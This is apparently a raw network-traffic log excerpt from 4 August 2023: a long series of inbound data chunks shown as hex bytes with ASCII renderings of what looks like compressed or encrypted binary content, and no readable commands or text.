                                                                                      2023-08-04 16:48:39 UTC1342INData Raw: 70 0f 36 5e a4 26 4f f9 6a 06 84 1f 2e 7a 82 05 65 e3 e5 4e 5a e0 cf 9a 58 32 19 fe 2e 18 11 68 de cf 86 22 f9 af fd 8c b0 7c cf 9b 07 5d 74 da f9 9a 3e 6d 2c 63 c5 51 48 8d 63 ff f2 c1 c1 6b 7e 2e 50 85 99 4b 72 44 2c d0 20 f7 0b 76 f0 4c 9d 3e cd a4 25 47 22 dd 91 f3 26 ac 9d cc b7 8e 11 b5 e6 de cc 3e 3f 3f c3 72 2c c0 4b 8d ff 49 a7 f0 57 96 ad 42 e5 76 ba 1d 13 68 e0 b7 ad 93 1e ba 62 21 fb db 59 5a db 3d 36 f4 f7 28 2a 7c 18 c1 1a 17 d8 e8 4e b3 6b 9f 7f ac f1 00 09 68 06 cc 8f 46 54 c0 21 4f d7 de e1 69 cc e2 32 fd 62 8e d6 5b 06 97 40 d5 48 a1 5e c3 35 66 be 27 a4 be ba 00 2a b8 79 a7 19 db 2a d3 33 88 da 6a 2f f1 33 1b 6e a5 82 7d 78 82 ab de ce 57 5c 26 66 9b 69 4f 3f 76 4f 77 87 2a 8c 58 63 a6 97 11 ff ba 07 e6 e7 67 85 de 66 fd 2a 3f a7 87 b5
                                                                                      Data Ascii: p6^&Oj.zeNZX2.h"|]t>m,cQHck~.PKrD, vL>%G"&>??r,KIWBvhb!YZ=6(*|NkhFT!Oi2b[@H^5f'*y*3j/3n}xW\&fiO?vOw*Xcgf*?
                                                                                      2023-08-04 16:48:39 UTC1346INData Raw: 71 fb a9 05 fa 6d c1 1c 2b 22 16 e8 99 e4 12 aa 14 42 25 e2 90 df a8 f9 da bc 9d 17 5d d1 17 57 b7 86 1a 3a d9 3e 29 39 63 d4 94 8a 18 df dc 30 8f d5 b0 33 e4 68 dc ff e3 ee 6e ff c2 9e 76 16 43 2c e8 16 eb 57 df bf 01 1e 8f 41 ea b3 95 31 79 96 be 62 d2 ed a2 6b 93 23 88 6f cc 21 4b 86 25 b6 f7 02 b5 08 8f 68 ca 48 f2 62 4f eb c3 54 ac 52 1c 78 bc 6a c6 d2 43 9d 01 0c ad 55 00 28 d7 75 73 54 de 0a ab 36 fd 68 7c 37 45 92 d8 e2 51 4b 33 b3 30 f0 ed 85 e8 3e 15 05 73 73 7c 48 a6 4f e0 1b 75 b0 ad bb 10 82 b0 3a 2a 1b 2a c7 9b 0e c7 a4 f6 c0 bb 0f 60 f2 46 aa 2f b3 79 94 7b 1d 49 0e 98 7b 48 7a 84 7c 82 a0 9c 8a 57 46 33 50 71 3b ae 0b f1 d6 ec be 86 d3 e6 b7 13 a7 bf 3e 42 d2 f4 30 76 af 38 ab 63 37 7f 67 a3 c9 30 8b 7d 01 6a 9b 45 ca 76 f2 5d e7 07 ed ea
                                                                                      Data Ascii: qm+"B%]W:>)9c03hnvC,WA1ybk#o!K%hHbOTRxjCU(usT6h|7EQK30>ss|HOu:**`F/y{I{Hz|WF3Pq;>B0v8c7g0}jEv]
                                                                                      2023-08-04 16:48:39 UTC1350INData Raw: 2c a0 28 9f b5 23 c9 6d ca b0 a1 99 ee 6a 2e 96 6b 31 27 c4 87 f2 a4 21 91 db cb 3c 2c 1b c5 b6 a0 61 2c e5 5f cd c6 c6 16 19 95 19 0b 92 c5 b7 2b bf 0f 46 f4 1a fd 0a db 63 c6 04 94 cf f5 19 bd ab 43 74 86 71 85 d1 af 8a 93 56 39 0c 26 81 63 5d c4 cc de c5 83 89 0e 90 a3 9b de 79 cd 2c 53 c6 b7 f8 42 02 8b bb 73 e3 9c 6b 45 63 16 a2 33 8c 36 84 a7 e4 b9 2d b0 56 35 b1 b4 d8 d5 98 c8 48 a9 41 42 e5 d7 7e a9 77 f0 fa e8 07 96 cc 5b 2b 65 0a bf 63 99 03 1c e5 8b 29 82 f7 39 3d 11 11 86 eb 79 69 31 0d b9 eb 2c 8c ca 5f 47 8a dd a2 fa 72 60 b9 de e8 87 c2 92 fc 9f b2 b5 66 25 b9 2e 4f 92 d2 1f 55 1b f1 2d cf 64 e9 14 d7 d1 da ee c2 59 ce a4 c7 c9 00 30 87 80 e7 ad 7f 84 3f f8 2f 43 9f 5f bf 40 a0 92 ca a4 81 13 37 96 49 24 a1 11 50 19 52 c3 ab f0 85 fd 06 4b
                                                                                      Data Ascii: ,(#mj.k1'!<,a,_+FcCtqV9&c]y,SBskEc36-V5HAB~w[+ec)9=yi1,_Gr`f%.OU-dY0?/C_@7I$PRK
                                                                                      2023-08-04 16:48:39 UTC1354INData Raw: 21 0d b0 3a fe e8 80 3f cf 31 c4 10 77 54 b3 d5 a7 97 61 f4 96 08 01 2b fe b8 99 65 a8 bb 05 3d 21 cf 38 48 15 e8 58 62 71 98 9a ac 85 b3 96 d4 7b 94 bc ac 2a f6 ae 4f 2e 91 eb 7c 9c 71 f7 07 81 36 d4 8e 4f b3 18 87 e9 67 10 a7 82 bf 4a f4 61 01 2f 6e e8 a0 c1 fe 3f a8 c3 12 fb 02 4f 5e d4 d6 d1 86 97 12 e9 a6 43 30 aa 56 c8 16 7e 74 51 8b 74 ae 46 23 45 a2 bc c8 81 c0 22 d1 4c 66 0b aa d3 b5 2d d1 38 0e e6 b3 08 d7 e0 c8 14 32 80 47 f1 66 ba 51 20 ba 60 36 38 18 4c f7 f3 6d a5 82 87 b2 15 ca b6 ec c6 f4 97 45 71 c3 ba 4c a4 28 fe 48 53 71 7e 55 c8 a8 85 fe 34 10 12 6f 7a 71 39 bf 0c 10 8f 70 5a 8f 70 d4 17 f4 70 e3 52 e4 c5 af 64 8e e4 2e 19 46 a0 17 b2 22 82 20 1e 3b 4b f2 8d e2 6a 1a 35 3f b8 8d e3 39 9e 8d ad c9 f5 61 0d d6 b4 b2 e0 d6 1a c4 4b 1e 04
                                                                                      Data Ascii: !:?1wTa+e=!8HXbq{*O.|q6OgJa/n?O^C0V~tQtF#E"Lf-82GfQ `68LmEqL(HSq~U4ozq9pZppRd.F" ;Kj5?9aK
                                                                                      2023-08-04 16:48:39 UTC1358INData Raw: 86 41 57 12 34 2d 44 15 69 1b 94 08 c2 eb 25 bf 5f 7a 0b 09 e2 98 4b 15 fa 01 b7 74 66 d3 1b ea 64 1f 8d 4b 58 11 2f 1b 0a 72 43 16 a2 03 c1 56 63 12 02 ee 5b 7d 10 eb 89 94 f5 ff 8a d7 23 0e 67 10 44 6b f4 bc 42 72 41 37 3c 32 aa 90 3a d4 65 79 1c 64 ba fe 22 fb ea d8 2e 2c 1b 61 b3 01 b8 64 d5 ec 53 5e 0d 5b 66 76 42 f4 ec 9e 60 54 d2 5d 55 82 40 b8 0a 10 21 a6 d5 9d 66 79 ba 29 6a 79 6a e5 e8 f2 b6 3b 72 f8 3b 49 94 3b 1c 6e 30 f2 3b 11 73 fa b2 21 22 07 23 68 7d fd 54 ac 11 e6 8f 44 b8 a2 31 ef 9c 40 8e 45 02 bc 1b 42 41 7f a9 5b 75 e9 c8 6a 1e 44 a3 73 8e 00 88 78 49 d2 e3 ac e4 c6 76 94 b1 ef f2 51 3c 12 e0 71 89 f5 a6 5a 9e f4 00 33 67 4f e6 8b c0 6f 2b 71 cd 29 9e 38 a3 58 f1 74 82 0f 07 32 40 ad b2 f5 42 5b fb d7 7d 63 88 7d 85 19 a3 c5 a3 0d f3
                                                                                      Data Ascii: AW4-Di%_zKtfdKX/rCVc[}#gDkBrA7<2:eyd".,adS^[fvB`T]U@!fy)jyj;r;I;n0;s!"#h}TD1@EBA[ujDsxIvQ<qZ3gOo+q)8Xt2@B[}c}
                                                                                      2023-08-04 16:48:39 UTC1362INData Raw: 1e 35 80 b8 69 3c 23 a3 0e 01 b8 e9 90 a3 d9 62 ea 9a 7b d0 0b 8d 2b 6c 71 df 1f e6 62 8f 56 26 48 fd 56 3e 2c 48 e0 0d 6f c5 3e 97 f8 b0 33 84 6f 05 79 27 ed 37 78 b9 9e 56 10 42 0f 33 1e 32 af 0e cb bf 1f 92 8d c2 d6 67 38 91 8b f2 c8 3e db cc 6b 8f 1b d1 fc 26 76 37 0f 9b e5 aa 7f 45 16 f3 59 fb a0 ea 8e 6c b0 5e 5b 3a cc 54 4a 9a 4b 11 e9 26 9f 0b 6f 43 86 c7 0d cd ce de 8d e1 8f 83 71 17 1c a0 ef a7 e0 19 db bd 9c e7 c5 92 d2 59 ef aa 00 9e ef 1d bb a4 79 8b 62 04 a2 f2 43 a3 1f ca fc f9 77 42 f0 3f 0c 53 73 b0 83 b6 8f 8e c4 af 4c 70 7a de 14 5e 53 bd 01 29 f5 b2 1a 5f 43 d1 5a b4 cc c9 68 cf 6e 91 63 25 27 76 c5 ff 8f 6c 72 e1 ed a2 69 21 dd c2 97 1d 91 99 84 79 87 21 9b 33 33 99 10 7a b0 83 60 62 d6 d8 c3 f7 e6 3f c6 21 98 04 a1 18 85 7d 12 a5 d3
                                                                                      Data Ascii: 5i<#b{+lqbV&HV>,Ho>3oy'7xVB32g8>k&v7EYl^[:TJK&oCqYybCwB?SsLpz^S)_CZhnc%'vlri!y!33z`b?!}
                                                                                      2023-08-04 16:48:39 UTC1366INData Raw: 1d 9a 05 15 f1 8f ef e4 70 80 04 84 e2 70 aa 85 d5 8d 11 db ed 0c d3 0b e1 b0 b9 60 c0 b0 e0 3d 07 bd 5a 89 c8 44 34 dc 66 e8 bc 8c 0e cd ed 98 53 fa 54 8a 9f b4 bf c9 5a d2 85 8b 7b b6 3a 4c b4 a4 51 87 30 64 fa 76 a1 2a c1 7d 03 40 57 08 ab 16 25 c0 e8 26 1b 46 99 16 d3 e8 6b 77 2d e2 81 ae 8e 9d 20 5d 22 44 e1 9b cc 20 11 b1 83 bc 17 b1 c1 ee 9b 25 3d 5e d0 9e 9e 44 85 bf ef 03 be 77 d8 12 e4 34 d6 e8 0b ea 6d bc ec c4 34 4b 52 cf 6d c7 d4 6b dd da f2 cf 4b 92 b6 c8 36 de 10 39 81 8f ae 07 1e c9 04 f6 be d4 ad 72 48 84 f5 02 09 ea c8 a6 84 3a 3a 77 61 4b dd 4d be c2 29 82 c9 bf 7c a9 ff f2 93 cd de 8d c1 61 b1 73 c8 92 25 1f ca 7e 30 df 77 61 ca 14 60 ef 68 ea 96 22 f5 9c bc 69 ce 1f 66 36 1f bc d0 11 1a e3 7c c7 19 23 5d 9c 2c 22 50 4e 2d 01 b0 ef 74
                                                                                      Data Ascii: pp`=ZD4fSTZ{:LQ0dv*}@W%&Fkw- ]"D %=^Dw4m4KRmkK69rH::waKM)|as%~0wa`h"if6|#],"PN-t
                                                                                      2023-08-04 16:48:39 UTC1370INData Raw: ab d4 99 1d ec c3 76 82 6a 0d af 1b b2 17 78 3d d2 96 d6 91 0e 07 69 ba 6b 29 7e ba 00 17 a0 f4 f9 80 d7 f8 8c 57 fe 81 7e ae 23 fc cb d6 4a c6 c7 d9 a9 0f e3 ee 43 92 85 38 31 15 5b 50 a0 e2 96 d8 b9 f7 81 47 6a f8 31 b5 43 b9 ff 4c 47 3b a3 df 8d f1 bc 45 8d 92 ad d3 01 6e 82 6a aa c8 95 93 f9 d5 61 2a 6e 3f 7f f3 e8 e2 c4 58 d1 79 6e 88 e7 8d 79 59 31 b0 61 69 c7 5e 05 61 db a5 b8 ff 25 4f 2d 24 47 f3 7a d1 95 df 0e 33 ec c1 63 13 98 e7 0a c4 6b c0 ac 6a c5 5d 97 f9 f1 14 46 9b f4 8b 4a 79 e7 38 53 0c b2 da 1f ad 02 e8 ee d9 e5 c2 24 cc cd 87 2c fa c2 e8 b2 ed 1c a1 2e 5e 10 e5 8b b2 32 bd 61 12 3c f6 f2 ae 5d 0e fa 5a fa ae 4c ac ce 60 1d 4f 99 37 6c b7 b6 a7 8d e2 4d 48 b6 ff 5e ed f5 ce 21 d3 07 94 88 5d e6 2f 2f c0 8d 88 f8 12 f0 df cf a3 c8 f4 65
                                                                                      Data Ascii: vjx=ik)~W~#JC81[PGj1CLG;Enja*n?XynyY1ai^a%O-$Gz3ckj]FJy8S$,.^2a<]ZL`O7lMH^!]//e
                                                                                      2023-08-04 16:48:39 UTC1374INData Raw: 8f 82 03 b1 a0 a6 03 d8 da 0d 5c cd c4 e8 b2 7d 5c 6f be e2 2d 57 df 55 49 3b 8b 25 ca 49 39 cf 12 be a8 71 b2 94 5e c1 bf 7d d9 9f 8a 43 26 a2 f7 03 57 c3 68 16 cf 88 0e 8f 95 a2 ae 1f 7b 4f 9f ef 31 22 95 cd 5f 83 df ce 07 f8 4a 7c 7b 95 47 ad 89 16 bd 33 9f 51 f7 3e 06 3e 9a bb 9e 93 7f 5a 8d 44 5b 7e bd 7c c6 cd 27 41 f2 d0 f0 a7 a4 8d cd 52 3d 19 3a c5 5e c2 80 8a 68 46 37 87 2c 0e 12 d5 6e 55 1c 6e c8 cd 28 96 f2 89 93 30 b7 ca 7e 37 5d 99 cc 66 5c 93 d8 c2 c7 18 cd f9 03 34 96 5b 6e 04 2f 13 77 3c 66 b3 1e 34 08 7f 1b 85 01 17 6f 50 53 06 75 b0 36 30 4e aa 67 a0 14 d9 e7 c9 6b c6 82 80 d3 ad 4b 72 e9 da 6c 9c d8 80 79 98 dd 0d 77 a8 1f 58 5d c9 15 40 5e e9 20 a0 99 cd 01 59 1b f0 f5 1e 82 0a 5a 7e 12 f4 3c 73 40 d2 ec 90 0a 69 20 f1 d5 d6 ac 2a 1a
                                                                                      Data Ascii: \}\o-WUI;%I9q^}C&Wh{O1"_J|{G3Q>>ZD[~|'AR=:^hF7,nUn(0~7]f\4[n/w<f4oPSu60NgkKrlywX]@^ YZ~<s@i *
                                                                                      2023-08-04 16:48:39 UTC1378INData Raw: 81 25 08 2d ef 43 a4 c5 20 65 8c e6 0e a4 8a 76 94 00 13 12 d8 d8 3f 3e 48 8d aa 9a 8a eb 89 1f 36 3e 72 ea ab 9a 67 3b 68 e6 e1 23 f5 cc 51 d9 60 d4 36 cf be b0 1e ea 79 32 fb 77 1a 95 5b 86 58 d8 b6 d5 95 07 e4 d0 05 60 aa ab 9d 61 6f 50 16 70 0c 71 f7 8e ee 33 17 06 d2 c6 f2 25 7d 3e 03 a1 77 81 f5 ea 0c 79 8c 21 cd 20 db b0 e7 e4 9d 33 9b c2 d6 93 0e 75 d8 b9 08 75 66 b5 67 a7 4e c0 80 29 7e 79 1e 07 39 ce 6a 2b 16 3d 9c dd 6a 35 87 bc 51 0a 22 e0 45 92 a0 5d 37 3c a8 23 32 19 e3 b3 8c 87 1e d9 0c 29 86 c2 07 8f 04 90 6e b2 6f f1 04 f7 12 a4 cd e9 15 db 40 f7 cb 4d e2 61 cc 11 42 0c b9 9a 2f 04 cc 9b 29 c5 fa a7 d3 64 c0 a1 41 89 4c 15 13 36 e6 0c ea 01 a6 5c 5e 9f da 99 e5 38 ec ae 36 a8 46 24 b8 0f d5 24 b1 e2 fd dc ce 13 f1 ce 8b bc 22 7f a2 ad 01
                                                                                      Data Ascii: %-C ev?>H6>rg;h#Q`6y2w[X`aoPpq3%}>wy! 3uufgN)~y9j+=j5Q"E]7<#2)no@MaB/)dAL6\^86F$$"
                                                                                      2023-08-04 16:48:39 UTC1382INData Raw: 2b 93 e0 fb 56 42 8f d5 b3 b5 a8 5d cc 4c e7 49 3b 6d 5b 46 11 9a 04 65 fa 49 f9 2e 0b 37 6b c1 01 10 69 d6 8d 80 09 69 78 92 a9 4e 70 07 37 7f c2 e0 47 28 a9 2a c7 0e 3a 17 2e 1b 3a 51 a9 c3 e0 43 9f e1 18 21 5e 4d 57 b6 d8 51 c2 00 de 1f 18 e8 65 0c 6f f5 73 a4 2a 2d b7 e6 41 b3 57 a0 15 11 fc 1d b2 34 1a 92 11 2f 9d 3c e7 df 39 a7 38 a0 d4 3d a4 8c 73 41 c7 75 a9 ee 17 cf 53 30 70 11 47 91 a3 bb 89 5a 65 3d dc 29 3b 44 59 ef bc d2 69 0e 3e ac 43 0c 05 84 6f f8 15 ce d5 f2 57 6d 24 7d c7 f4 ef 73 97 52 0f 78 0a 7b ea aa 76 f0 f1 82 d4 91 f0 66 e8 c1 d0 f6 b5 c1 be f1 bb fb 06 0d 13 75 21 71 9f 36 12 8d c3 64 4c 76 f6 4c 73 3b 86 fa 82 94 01 cc 8a 32 b4 1d ec 60 06 88 3b af 99 08 2e 1f dd 0d fe 26 b3 59 10 1d b1 68 cf 11 83 4b ce e5 e8 80 2f c4 1d ad de
                                                                                      Data Ascii: +VB]LI;m[FeI.7kiixNp7G(*:.:QC!^MWQeos*-AW4/<98=sAuS0pGZe=);DYi>CoWm$}sRx{vfu!q6dLvLs;2`;.&YhK/
                                                                                      2023-08-04 16:48:39 UTC1386INData Raw: 99 32 5c 6e da 4d 90 6e 03 ba 0a dc fe ee 06 8b 4c c7 71 99 4c 41 14 82 3c a1 7a 50 90 4d 37 2d b7 a2 29 a2 3c 23 f6 c6 4d 85 d9 3f 20 8d ed 58 36 6c ac 98 18 34 95 49 e7 78 02 49 7d d5 5c 69 36 c1 5e c7 cb fc 34 2b b6 dc e5 d4 89 30 dd 80 ed 3e 33 47 5f 1c 32 13 93 68 9b 71 b1 f0 57 47 5f 10 d9 28 22 dd f0 24 d4 66 e3 4f 50 1e 40 c3 f2 d0 45 74 ea 32 fd d9 72 27 db da ad 74 cc 0c 99 b1 c3 75 bb a7 96 a0 93 d8 79 5a 2f 13 b5 40 1e a8 41 74 91 d5 a5 ce 2e 8a 10 e2 e3 91 da c2 55 6a fe 47 ba 28 8f d9 61 bd b5 7a fa 9c 17 a5 b6 c2 2c 09 2b 3b 99 1f d2 39 b6 8a da 23 b4 02 d5 8a 45 79 0e 5c 09 46 09 dd d8 46 92 cd fc 08 f8 c1 1d 2e 61 96 66 3a 2a 7f 72 e1 66 0f 8c 63 9f 42 80 7c fb 69 48 38 9f 3b 86 35 0c 28 d4 c7 90 50 42 68 28 fb 52 66 67 3f bd 14 8a be f8
                                                                                      Data Ascii: 2\nMnLqLA<zPM7-)<#M? X6l4IxI}\i6^4+0>3G_2hqWG_("$fOP@Et2r'tuyZ/@At.UjG(az,+;9#Ey\FF.af:*rfcB|iH8;5(PBh(Rfg?
                                                                                      2023-08-04 16:48:39 UTC1390INData Raw: 4a 5c 36 00 8a 78 df 7a 7d 7b 4e 3e 32 b5 eb 0b ac 3a 0b d0 ad 4c 7c e4 b2 74 c4 90 9d 9c 1a c8 82 5c e9 66 ca 39 0e d1 1f 3e f2 a6 1c d2 aa 3c aa 95 97 d0 12 b1 fa 2f 13 04 17 69 58 a5 37 81 7a 82 51 fe be 90 72 bf 26 fc b4 b5 1d 0b 4d 10 17 32 b6 68 ad ee 00 b6 09 86 4d dc a0 66 4d 95 21 d1 03 1d 22 30 ef 2e 6c c7 e1 c0 3d bc 5d d7 ec b3 1f 60 a7 c3 62 70 86 b9 33 a3 27 ff 0b 5a 3d 2f 24 88 51 4c 0e 13 7a 29 f8 c0 45 76 39 d3 9e 9f 45 fc d7 8b d4 f9 2c 3a d5 0f 82 6b 67 61 60 68 02 28 46 56 88 b7 13 a0 7b 20 6a d9 f1 b8 2d e0 c2 b3 2c d5 1d bc 4a dc ef fb b6 8d 12 2c 99 54 ce 23 b6 5a ef dd 03 76 c3 0f f3 eb 64 ce 64 98 93 10 21 2d 0c 5e 76 ac 93 28 db d9 c0 79 fc 5f e6 df fa 7d 18 73 e1 66 72 11 e9 4c 86 67 0c af 32 15 43 b6 d9 50 18 8d a6 a9 92 5a 5e
                                                                                      Data Ascii: J\6xz}{N>2:L|t\f9></iX7zQr&M2hMfM!"0.l=]`bp3'Z=/$QLz)Ev9E,:kga`h(FV{ j-,J,T#Zvdd!-^v(y_}sfrLg2CPZ^
                                                                                      2023-08-04 16:48:39 UTC1394INData Raw: 7c dd c0 b3 b4 05 49 3a d8 a0 b6 b7 da f2 e1 c5 20 1a 63 ab 38 3f 1a 21 48 85 3e b4 76 dd 79 ff a1 61 db bb 0c c1 ba 8a 9c 36 af 61 2b 30 ad ff 67 66 5d 6e f8 3b 1c a2 ce 37 c7 a7 98 6d 60 1d 96 4d b0 38 ed 2e dd e3 75 d4 9e 81 48 4d 9d 68 f1 77 66 84 ed fa 30 3a b2 2e 5b c9 b0 f4 c9 dd 6c a7 39 aa a7 28 80 54 2a 90 4b ee dd 1e 31 7b 0a 72 62 73 e8 3f 2a 0c 6b a6 97 8a af 26 74 16 e3 7e 1b e6 c3 c0 ef d1 29 99 0c 8e 04 01 d7 cb fc eb a9 2f bc 5f 87 25 d1 c4 55 45 80 63 db dc 52 14 4e ae a3 76 0d 00 1f c3 fc e8 cf a5 44 c7 60 d9 53 55 87 f7 8c 45 e9 3c d8 50 91 b1 03 75 9a 9c 4f c1 93 bc 80 94 14 28 f9 d4 64 06 eb 34 1c 63 a8 6f d1 05 81 ef d3 c8 d3 9e 29 ec ee 18 83 9e c9 8a a1 fd 98 24 13 64 1e aa 50 15 60 79 cb 8f b1 09 1c 06 cd 2b d9 af 94 2f 75 17 91
                                                                                      Data Ascii: |I: c8?!H>vya6a+0gf]n;7m`M8.uHMhwf0:.[l9(T*K1{rbs?*k&t~)/_%UEcRNvD`SUE<PuO(d4co)$dP`y+/u
                                                                                      2023-08-04 16:48:39 UTC1398INData Raw: 7e 38 08 8e 72 52 8c 79 af 38 e5 93 19 ed db 5c 8c d8 0a f6 7c 61 5c 53 bb 0f 8d f9 71 0e b1 e1 08 4b 6c a4 ea 75 27 26 01 e9 ea e0 85 6c bf 0b 05 86 b0 69 73 57 3a 1c bc f2 7a 2e 38 70 00 10 e2 56 36 15 76 7c 89 4f b6 41 6b a6 d9 eb 8d bc 4f cd bf 56 f6 10 e8 66 be f4 67 37 45 39 06 0e 58 66 ea a1 81 2e 71 cd d1 74 95 27 73 a8 7f 3c f5 05 35 bc 64 71 a9 86 96 24 c9 e0 31 33 2a c1 4c 8d a8 a2 0c 72 1f 27 15 65 da 7d 7d 57 a6 eb 5e 4d 0a f4 54 94 50 50 b7 9b 87 39 32 0c bf ce 5a 6d 3a 6d d9 e9 c4 ce d1 9b 6e e7 dc 65 c0 38 bf 62 63 60 e6 95 00 d9 73 d7 5e 84 ea 31 df 13 5e eb 61 4a 28 b4 7b 4f 5a 9a 3f b4 b1 e9 29 98 e1 a8 bf 65 f3 ab 78 21 32 0b cc b3 18 8e 2d a6 65 bd e3 82 3e 3a 55 f8 a7 bb df 9c d5 fc b8 0b 0d fb 04 e5 5e c9 03 18 28 8b 38 ec 09 78 07
                                                                                      Data Ascii: ~8rRy8\|a\SqKlu'&lisW:z.8pV6v|OAkOVfg7E9Xf.qt's<5dq$13*Lr'e}}W^MTPP92Zm:mne8bc`s^1^aJ({OZ?)ex!2-e>:U^(8x
                                                                                      2023-08-04 16:48:39 UTC1402INData Raw: d0 81 cc 47 40 8a da 7a f3 d8 69 7d 63 32 ad f5 d6 26 32 b5 b5 c1 46 9f 35 46 3e 6b 84 03 d3 e2 c1 e2 e0 e2 69 91 d6 c4 54 ef 26 b1 d0 5f bd fe 03 7d d5 50 5d d2 77 a9 56 d7 9b 7b 82 88 45 dd 62 51 c2 90 06 06 34 7e 44 24 0b c1 ed 3f 2b 15 48 22 22 38 7e ef d2 3a a7 03 ed d0 41 76 be ca f5 63 ae f5 67 e2 4f 2d d5 28 df 4d 8a 9b 1e c4 3a 6d 5a a4 0e f6 81 6e 6e 22 07 16 25 b4 0b 59 18 4e 03 f4 e0 45 7f e1 5e 9a 74 55 8f ef c7 94 69 05 92 ba 5b 4f 1a b7 e8 a2 cc 8e ef 1b 93 32 17 d9 fd 72 84 a3 61 86 61 ed 25 e0 1d 1b ba 97 32 15 00 ca 57 cd 96 cb 48 e8 bf 8b 2b 20 3c 40 d3 91 04 fa cd 68 2a 3d f9 e2 54 e7 1e 05 7f 4b 92 6a 3c 15 d8 b5 3f 02 4c 0c 2c 5f d4 aa 1f 32 d7 d6 78 ed 34 74 d0 a8 76 b0 ec cd df 6c ff e7 38 6b 37 a1 91 6c 06 93 3b db 6c d6 a8 47 8f
                                                                                      Data Ascii: G@zi}c2&2F5F>kiT&_}P]wV{EbQ4~D$?+H""8~:AvcgO-(M:mZnn"%YNE^tUi[O2raa%2WH+ <@h*=TKj<?L,_2x4tvl8k7l;lG
                                                                                      2023-08-04 16:48:39 UTC1406INData Raw: 3a 68 ce f3 3b 82 19 61 7f 6b 66 bd d2 52 88 ed 90 62 88 db ff 40 91 74 87 95 2c f1 21 fc 9f 09 7d 87 84 85 15 ae ba 1a 5d cf 1d cd 97 cf 64 c8 77 80 78 be 02 1e e6 f5 0c 63 ca 25 67 73 a9 c1 c8 cb 94 f2 1b 7a 43 9c aa 85 57 12 6d cd 2a 96 c1 ca a6 ba e6 b3 b9 4c ec 17 73 ee aa cf c4 03 a1 2c d1 16 2e e1 59 0c 02 56 48 ee 20 2d 14 55 d6 06 c5 d4 d0 a0 dc 44 68 41 2c f0 cd b1 e0 30 30 e7 b9 47 b5 b6 9c 7e 85 5c b8 3b 51 54 d8 6f 96 ae e2 7c 6c 46 14 7b 40 77 eb 7d 18 90 7f 4a 18 b6 1a 3e d2 4d 47 74 52 20 08 18 15 a2 31 36 4d 0f d4 6b 8d 36 5f fb 77 92 8e 11 29 fc 85 bd 84 f5 8c 12 18 b5 8b c6 63 05 8f 70 64 be 0d 5d d3 5a 83 5e df 7e 5d 5c c9 a7 ac 53 f7 9a 61 16 9b 99 b2 bb 73 1b a8 9e 48 8d e6 e9 a9 3a 6c 17 51 a9 38 f8 aa 3b b6 e3 79 1f 64 fb b4 85 05
                                                                                      Data Ascii: :h;akfRb@t,!}]dwxc%gszCWm*Ls,.YVH -UDhA,00G~\;QTo|lF{@w}J>MGtR 16Mk6_w)cpd]Z^~]\SasH:lQ8;yd
                                                                                      2023-08-04 16:48:39 UTC1410INData Raw: 7e 6c 03 d1 4e 84 7b eb 03 62 38 40 6a 10 48 1b 7e cb e2 84 24 f4 9a 3c 8c fe f7 fb 36 6d b0 cb e9 aa b5 23 22 a1 05 2a 13 80 1e 4d 4f fc a6 78 3b db 72 11 d5 43 71 a3 8b 37 4c 15 3f a4 22 fa 58 ec d1 65 be fc ca 21 7f 6a e2 18 14 57 9c 1c 63 c2 b8 ca d2 b7 c4 63 87 67 b1 27 38 94 03 ae b5 0b 38 f9 af 1f 81 65 6e 9e da 24 4e c9 fe 11 a7 bc c0 66 a4 d6 c5 60 21 ca f9 1b da bd 1c 50 dd 91 4e 90 51 1e 3b c6 6d dc f6 92 ca cc 93 e7 09 65 2e 89 d8 03 32 20 7f f5 4b 84 c0 00 9a 8a 4b a1 02 13 71 dd 17 b7 52 13 63 c4 30 8f 1a d9 49 89 ff d5 fc 6f ce 7f 69 90 b0 e3 50 e2 f5 79 f2 16 24 b0 12 31 f5 d6 d7 df a9 67 19 90 e0 7f 81 a1 dc c0 27 e2 01 1b 45 3c 3a 77 06 c6 e7 f1 66 4b 85 26 5e 4b bd f9 9a b7 35 d6 e6 2a 86 68 e8 e5 22 4d 15 1a 03 a4 8a 86 55 98 64 94 88
                                                                                      Data Ascii: ~lN{b8@jH~$<6m#"*MOx;rCq7L?"Xe!jWccg'88en$Nf`!PNQ;me.2 KKqRc0IoiPy$1g'E<:wfK&^K5*h"MUd
                                                                                      2023-08-04 16:48:39 UTC1414INData Raw: 38 d1 fa 5c f3 de 82 a6 53 8d fe 6a d5 59 84 fc fd 6f 47 17 75 a3 e2 56 64 db 8d d1 65 66 80 36 f5 79 7a 1b bf 73 cc 8f af 72 db cc 40 8e 7e fd 83 9c 10 27 38 42 05 26 7d 10 62 2e 36 ce 80 40 f6 b7 24 63 17 42 7e cb c8 90 46 46 c0 b7 e1 f5 4b c6 4c ba f8 b5 da 54 2c ba fe 03 aa 08 0d 6c a4 bb d5 7b dc a8 66 cd 94 26 d7 74 7d c1 58 23 44 7e ff d8 31 7c a7 ac 8b e9 46 04 93 b5 0a fc e6 70 6e b6 8f 0a 3a 30 33 a3 58 af 08 a9 25 f8 bb 6c 97 1e 62 08 6b d3 f0 26 58 1c 36 66 25 86 a1 51 1a fe 28 e5 45 c1 96 a3 13 fd eb fd dc 7a 2a 95 16 db b0 d8 56 7e 23 e2 49 1d c8 6c 94 68 0f d0 a2 95 1e a2 be c4 4e aa c0 71 eb 10 e6 0e 44 6e ed 6a a5 28 85 02 f4 76 d4 b9 fb c7 1e 12 9b dd ff 4e 4a f8 d6 f6 ba 84 27 72 9d 29 8c 78 d9 98 de 0a 1a d5 0d 03 5e 9a ee 67 2c aa 49
                                                                                      Data Ascii: 8\SjYoGuVdef6yzsr@~'8B&}b.6@$cB~FFKLT,l{f&t}X#D~1|Fpn:03X%lbk&X6f%Q(Ez*V~#IlhNqDnj(vNJ'r)x^g,I
                                                                                      2023-08-04 16:48:39 UTC1418INData Raw: 99 40 e6 32 e6 35 17 9a 2c 74 80 cd 32 e5 0e e6 35 5b 94 58 cc b6 64 23 26 d1 66 17 86 cf 7a c8 71 f6 49 ba 65 9b a1 6c 5f b9 f8 ef e8 b8 16 83 d3 9b ea 86 49 0e 2a 76 f1 b3 c1 f3 59 d7 4a a5 73 33 b7 a7 b5 78 5a 53 b8 aa b2 3e d8 15 f1 9c d7 0b 1f 04 ae 85 d9 1b e7 df d0 e7 55 80 ae d9 3e 7a 17 7d 4f 4d ac 1b 2e 2c 3b b4 ee 3b 86 ad 51 9d f4 83 36 7f 34 37 74 e1 8e ae ef a3 23 65 49 31 d9 12 85 64 7e 8f 39 00 75 ad de a0 64 6c bf ab 28 9f 2e 0c 40 01 40 7b 7c 21 23 64 1c 04 c5 5a a0 49 c0 ae d0 b7 a4 7c 13 e3 ac 45 2d 97 1a 81 c1 70 58 07 67 ce 9f 39 b6 db 26 f1 ed 54 2e 73 85 22 fb d9 8a 